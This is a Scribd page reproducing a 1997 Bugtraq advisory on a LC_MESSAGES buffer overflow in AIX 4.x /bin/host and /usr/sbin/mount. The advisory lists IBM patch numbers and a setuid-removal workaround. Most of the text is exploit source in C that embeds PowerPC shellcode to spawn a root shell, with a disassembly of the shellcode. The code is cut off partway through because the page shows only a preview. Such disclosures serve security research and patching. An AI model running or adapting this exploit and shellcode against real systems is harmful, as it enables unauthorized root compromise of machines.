Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Standard view
Full view
of .
Save to My Library
Look up keyword
Like this
0 of .
Results for:
No results containing your search query
P. 1


Ratings: (0)|Views: 2,605|Likes:
Published by dmol

More info:

Published by: dmol on Mar 19, 2007
Copyright:Attribution Non-commercial


Read on Scribd mobile: iPhone, iPad and Android.
download as TXT, PDF, TXT or read online from Scribd
See more
See less





Subject: AIX 4.2 LC_MESSAGES + mount exploitTo: BUGTRAQ@NETSPACE.ORGX-UIDL: 5abe9f7167f54ad2a3d9f6a8782cabceStatus: ROHello allThere seem to exist a buffer overflow condition in AIX 4.2/4.1/? whenthe shell variable LC_MESSAGES is long enough./bin/host and /usr/sbin/mount are vulnerable to spawning a root shell.Solutions:1) IBM was informed on 972903 and on 970403 wrote the following:>The APARs are going through the regression test lab right now and should>be available by next week. Here are the numbers:> AIX 4.2: APAR IX67377> AIX 4.1: APAR IX67407> AIX 3.2: APAR IX674052) a little bit ugly, but works:#chmod -s /bin/host /usr/sbin/mount3) I have not tested it, but if you are in the mood you may try tochange LC_MESSAGES in /usr/lib/libc.a, /usr/lib/* and everywhere else tosomething unpredictable.If the C program does not work, try the ksh script which does some bruteforcing.PLEASE NOTE my e-mail addresses bellow and do NOT REPLY to this message.Georgi Guninskiguninski@hotmail.comstgun@sgg.vmei.acad.bgguninski@linux2.vmei.acad.bghttp://www.geocities.com/ResearchTriangle/1711---test2.c-------------------------------------------------------------------------------------------/*AIX 4.2/4.1 LC_MESSEGAS /usr/sbin/mount exploit by Georgi Guninski----------------------------------------DISCLAIMERThis program is for educational purpose ONLY. Do not use it withoutpermission.The usual standard disclaimer applies, especially the fact that GeorgiGuninskiis not liable for any damages caused by direct or indirect use ofthe information or functionality provided by this program.Georgi Guninski, his employer or any Internet provider bears NOresponsibility for contentor misuse of this program or any derivatives thereof.By using this program you accept the fact that any damage (dataloss,systemcrash, system compromise, etc.) caused by the use of this program isnot
Georgi Guninski's responsibility.In case you distribute this, please keep the disclaimer and myaddresses.-----------------------------------------Use the IBM C compiler.Compile with: cc -g test2.c-----------------Georgi Guninskiguninski@hotmail.comsgg@vmei.acad.bgguninski@linux2.vmei.acad.bghttp://www.geocities.com/ResearchTriangle/1711Suggestions,comments and job offers are welcome!22-Mar-97*/#include <stdio.h>#include <stdlib.h>#include <string.h>char prog[100]="/usr/sbin/mount";char prog2[30]="mount";extern int execv();char *createvar(char *name,char *value){char *c;int l;l=strlen(name)+strlen(value)+4;if (! (c=malloc(l))) {perror("error allocating");exit(2);};strcpy(c,name);strcat(c,"=");strcat(c,value);putenv(c);return c;}/*The program*/main(int argc,char **argv,char **env){/*The code*/unsigned int code[]={0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,0x7c0903a6 , 0x4e800420, 0x0};/* disassembly7c0802a6 mfspr r0,LR9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)3c60f019 cau r3,r0,0xf019 --CTR60632c48 lis r3,r3,11336 --CTR90610440 st r3,1088(SP)3c60d002 cau r3,r0,0xd002 --TOC60634c0c lis r3,r3,19468 --TOC90610444 st r3,1092(SP)3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'6063696e lis r3,r3,2699090610438 st r3,1080(SP)3c602f73 cau r3,r0,0x2f7360636801 lis r3,r3,266253863ffff addi r3,r3,-19061043c st r3,1084(SP) --terminate with 030610438 lis r3,SP,10807c842278 xor r4,r4,r4 --argv=NULL80410440 lwz RTOC,1088(SP)80010444 lwz r0,1092(SP) --jump7c0903a6 mtspr CTR,r04e800420 bctr --jump*/#define MAXBUF 600unsigned int buf[MAXBUF];unsigned int frame[MAXBUF];unsigned int i,nop,mn;int max;int QUIET=0;int dobuf=0;char VAR[30]="LC_MESSAGES";unsigned int toc;unsigned int eco;unsigned int *pt;char *t;int egg=1;int ch;unsigned int reta; /* return address */int corr=4604;char *args[4];char *newenv[8];int justframes=1;int startwith=0;mn=78;max=100;if (argc>1)corr = atoi(argv[1]);pt=(unsigned *) &execv;toc=*(pt+1);eco=*pt;if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) ){perror("Bad parameters");exit(1);}

Activity (3)

You've already reviewed this. Edit your review.
1 hundred reads
1 thousand reads
mbirk_test2 liked this

You're Reading a Free Preview

/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->